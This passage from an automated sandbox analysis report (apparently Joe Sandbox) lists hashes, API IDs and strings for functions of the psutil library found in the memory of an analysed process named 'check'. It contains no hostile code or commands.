                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3815096754f83270638b2f75041748c4c5a74b75e2489ef7d1a75f0052e1f187
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F52154D1B1CA4682EF309B36E85437923A1BF4C789FC16431CA8E46765FE3CE5098780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __acrt_iob_funcfprintf$Err_ErrorLastWarn__stdio_common_vfprintf
                                                                                                                                                                                                                • String ID: psutil module couldn't set SE DEBUG mode for this process; please file an issue against psutil bug tracker$psutil-debug [%s:%d]> $psutil/arch/windows\security.c
                                                                                                                                                                                                                • API String ID: 306901517-4141899461
                                                                                                                                                                                                                • Opcode ID: f2194c8e053424292d9a5393c0b623c5170a1408838a0c2b7a2a2b9c52ca4fbd
                                                                                                                                                                                                                • Instruction ID: e5bd3800d0ce9a8b80cb91b7a11b3c96a6e924df3c677386967d8043929d4b06
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2194c8e053424292d9a5393c0b623c5170a1408838a0c2b7a2a2b9c52ca4fbd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C01DEA4F09A0281E6349B77D8552B42262AF4DB84FC12136C48D062B1FE6EA585C7C1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErr_HandleProcess$AffinityArg_BuildCallDeallocErrorFromFunctionLastMaskObjectObject_OpenParseTupleValueWindows
                                                                                                                                                                                                                • String ID: OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 1951706264-2746090705
                                                                                                                                                                                                                • Opcode ID: 823163d15e988816da25f41325fa0c3a318b2443c2e7eeeeda2df9b2712e6337
                                                                                                                                                                                                                • Instruction ID: 981ed42c00c02e59afafe9791965d94ab757deadcff986b974e3855d181b275a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823163d15e988816da25f41325fa0c3a318b2443c2e7eeeeda2df9b2712e6337
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 302168A0B0CA4781EB709B37F84417963A0FF5C784FC56435DA9D426A5FE2CE4458780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseErr_Process$Arg_BuildCallCountDeallocErrorFromFunctionLastObjectObject_OpenParseTupleValueWindows
                                                                                                                                                                                                                • String ID: OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 2606922913-2746090705
                                                                                                                                                                                                                • Opcode ID: 7f4d436ac089e1850c398ef9c721bad44193c8434375873144d6a517292c8fd0
                                                                                                                                                                                                                • Instruction ID: fdd5aeb3f8771d58274cf48382d7b33afc0ffbd1677d460ea6e23e02322da3ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f4d436ac089e1850c398ef9c721bad44193c8434375873144d6a517292c8fd0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B52195A0B1CA4382EB749B37F84817963A0FF5C780FC57035D68E426A9FE2CE4858780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErr_Handle$Arg_BuildCallClassDeallocErrorFromFunctionLastObjectObject_OpenParsePriorityProcessTupleValueWindows
                                                                                                                                                                                                                • String ID: OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 1753720984-2746090705
                                                                                                                                                                                                                • Opcode ID: 261146d4c444c7521d2cc4ffe72d4223482171d327919a566f034f2f947f5804
                                                                                                                                                                                                                • Instruction ID: 9152dd62fd1457436d0135636d23f3d2c252db9b558e454d517cfd033575492f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 261146d4c444c7521d2cc4ffe72d4223482171d327919a566f034f2f947f5804
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE21C6A1B1C94382FB749B77F85417923A1AF5D780FC57031DA8E42265FE2CE484C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                • Opcode ID: e6f5dbe589a2c3995ad2bc0b24e51e0ee76866c95b2c60f85b8e695e3761c329
                                                                                                                                                                                                                • Instruction ID: de01fe7c47aba0a0f5fc4754c083d60d0fb025e211e94a9fcc2a13c69a511fd1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6f5dbe589a2c3995ad2bc0b24e51e0ee76866c95b2c60f85b8e695e3761c329
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5815EE1F0C64346FA709BB7D4412B96290AF8D780FD4B035DACD67796FE2CE8458680
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErr_Handle$Arg_CallClassDeallocErrorFromFunctionLastObjectObject_OpenParsePriorityProcessTupleWindows
                                                                                                                                                                                                                • String ID: OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 4056584219-2746090705
                                                                                                                                                                                                                • Opcode ID: 15169f86702ad4971ce2abd0ce0dc3fd6ba16e4ede2ef9804ab03194ea32df0c
                                                                                                                                                                                                                • Instruction ID: dfc9ded75bb018a6087e68aeb0f7e0fda94b725dbc2ab296866983a1864cc850
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15169f86702ad4971ce2abd0ce0dc3fd6ba16e4ede2ef9804ab03194ea32df0c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A12153A1B1DA0282EB749B77F88417923A1EF9D780FC56035DA9E42665FE2CE484C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErr_HandleProcess$AffinityArg_CallDeallocErrorFromFunctionLastMaskObjectObject_OpenParseTupleWindows
                                                                                                                                                                                                                • String ID: OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 3581221727-2746090705
                                                                                                                                                                                                                • Opcode ID: fa3fa82f6b551e7269b9b07355541d8575d2c45b76d037af1835dc1a31d048db
                                                                                                                                                                                                                • Instruction ID: 56e662769961f5d99814440a7c84e2d532553b8bdf38622c8cd61fb4e9f630b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa3fa82f6b551e7269b9b07355541d8575d2c45b76d037af1835dc1a31d048db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 152141A1B1DA0681EB749F3BF84427963A1EF5CB80FC56035DA8E42765FE2CE4848780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_$AdaptersAddressesMemoryStringmalloc
                                                                                                                                                                                                                • String ID: GetAdaptersAddresses() syscall failed.
                                                                                                                                                                                                                • API String ID: 626373182-4058666537
                                                                                                                                                                                                                • Opcode ID: f268da7f3e54d4729961f0b4698a17396fd60a5383146018dc32a09b834da337
                                                                                                                                                                                                                • Instruction ID: 5db43feb019e0543687ab6079c4c6c69501e554f2ec4e644db78467add4a1a28
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f268da7f3e54d4729961f0b4698a17396fd60a5383146018dc32a09b834da337
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35213075B18E8282EB24DB77E85056963A1FF8DB44FC96035DA8E46B14FF3DD4098A40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __acrt_iob_funcfprintf
                                                                                                                                                                                                                • String ID: GetActiveProcessorCount() not available; using GetSystemInfo()$psutil-debug [%s:%d]> $psutil/arch/windows\cpu.c
                                                                                                                                                                                                                • API String ID: 3693261709-2941878183
                                                                                                                                                                                                                • Opcode ID: c5b043be2e10d404285f8f5e9a4273391728c037684a47e0c341a3cd5ffcbaab
                                                                                                                                                                                                                • Instruction ID: 107e07a28e6d7f1dcab0d218d969d912d27bb2cf97a77e3b0f422e00957dd27a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5b043be2e10d404285f8f5e9a4273391728c037684a47e0c341a3cd5ffcbaab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A41109E0F08A0281FB349B77E8912B52661AF4DB80FC02137C58E463F1FE2CA58583C1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandle$Arg_CharClearErr_ErrorFromLastOpenParseProcessTupleUnicode_Widefree
                                                                                                                                                                                                                • String ID: psutil_pid_is_running -> 0
                                                                                                                                                                                                                • API String ID: 865494411-3467909595
                                                                                                                                                                                                                • Opcode ID: 6d34e352a73c4d35ee2cc0d1545ec051cbc9bb0d4908c44f6338ed070a0d18c8
                                                                                                                                                                                                                • Instruction ID: 8e9c65db31950316026d2c27dafd2378acf69559c2b21143d6e6c019bc91c831
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d34e352a73c4d35ee2cc0d1545ec051cbc9bb0d4908c44f6338ed070a0d18c8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A42195A5B0CA4652EB348B73E45017A5391AF4CBA0F946135DEAD47AD4FE3CD4448780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
                                                                                                                                                                                                                • String ID: (KsOI)$xwc
                                                                                                                                                                                                                • API String ID: 1097362947-1454042600
                                                                                                                                                                                                                • Opcode ID: f1fa03fa6a6b4cd222d345f1fad65bf5d43a73d43af6c6cffd52f021c8af454b
                                                                                                                                                                                                                • Instruction ID: b77ea130a7d7e1f931a00fff859dd1d57b586a3bf9fcf64bcb132b71bd47ca55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1fa03fa6a6b4cd222d345f1fad65bf5d43a73d43af6c6cffd52f021c8af454b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC111FB1B0EA8285EA708F33E4582796360BFADB95F842032DD8E57754FE3CE0458780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
                                                                                                                                                                                                                • String ID: (KsOI)$xrw
                                                                                                                                                                                                                • API String ID: 1097362947-822595024
                                                                                                                                                                                                                • Opcode ID: 458c2ee6d20f3bb9de1fac3cb92d40bfc05a4854994c737ec156b289ef9f6c70
                                                                                                                                                                                                                • Instruction ID: 95cdda18aecbccc17614057aeadd8a8e108e4395de198d3df4e3fb1022b1c9f3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 458c2ee6d20f3bb9de1fac3cb92d40bfc05a4854994c737ec156b289ef9f6c70
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B111FB1B0EA8285EA708F33E4582796360BF6DB95F842032DD8E57754FE3CE0458380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
                                                                                                                                                                                                                • String ID: (ssss)$unknown
                                                                                                                                                                                                                • API String ID: 1595588724-1660319459
                                                                                                                                                                                                                • Opcode ID: e2826470fad3ed783d4f9c8ca84906cbf311ba82c73cffe1781df9a5fa7549c8
                                                                                                                                                                                                                • Instruction ID: a6c1ce621be3bbcc70ee0210e514a2085b5da287ca1abf4672b58bd20d9f475e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2826470fad3ed783d4f9c8ca84906cbf311ba82c73cffe1781df9a5fa7549c8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4114FA1B09A8685EA30DF72E8046B963A0FF4CB58FC45035C98E46755FE3CE149C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
                                                                                                                                                                                                                • String ID: (ssss)$unmounted
                                                                                                                                                                                                                • API String ID: 1595588724-1640327555
                                                                                                                                                                                                                • Opcode ID: 63ee6a522132240beecb69959a7b9f6fd17ab765508e1b04a84150df5d8db2f5
                                                                                                                                                                                                                • Instruction ID: 41f3925053f6dc20c48b03929ae9ed06ac981d31d4919946c78bd9499bdac9c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63ee6a522132240beecb69959a7b9f6fd17ab765508e1b04a84150df5d8db2f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0114FA1B09A8685EA70DF72E8046B963A0FF4DB98FC45035C98E46755FE3CE149C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
                                                                                                                                                                                                                • String ID: (ssss)$remote
                                                                                                                                                                                                                • API String ID: 1595588724-821215876
                                                                                                                                                                                                                • Opcode ID: c5d383849ceb467fe3cd522dbdc1de53e3ce2a76eddd1715da7808da9c4313bb
                                                                                                                                                                                                                • Instruction ID: 4e0ae54c329859680cae7b538ec8f413083bf5f7afd4d3d37206d34c621327c3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5d383849ceb467fe3cd522dbdc1de53e3ce2a76eddd1715da7808da9c4313bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11114FA1B09A8685EA30DF72E8046B963A0FF4DB98FC45035C98E46755FE3CE149C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
                                                                                                                                                                                                                • String ID: (ssss)$ramdisk
                                                                                                                                                                                                                • API String ID: 1595588724-2792464965
                                                                                                                                                                                                                • Opcode ID: e91d0a95cf2c3ee6267aabef2deee6cb03a2ff84e2c239d9fae4b4d4be05ec50
                                                                                                                                                                                                                • Instruction ID: 99488f34a5afbaadbb19b956fa06a79139fd0eb779002b90a0297ab6d7ba8e83
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e91d0a95cf2c3ee6267aabef2deee6cb03a2ff84e2c239d9fae4b4d4be05ec50
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC114FA1B09A8685EA30DF72E8047B963A0FF4CB58FC45035C98E46755FE3CE149C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
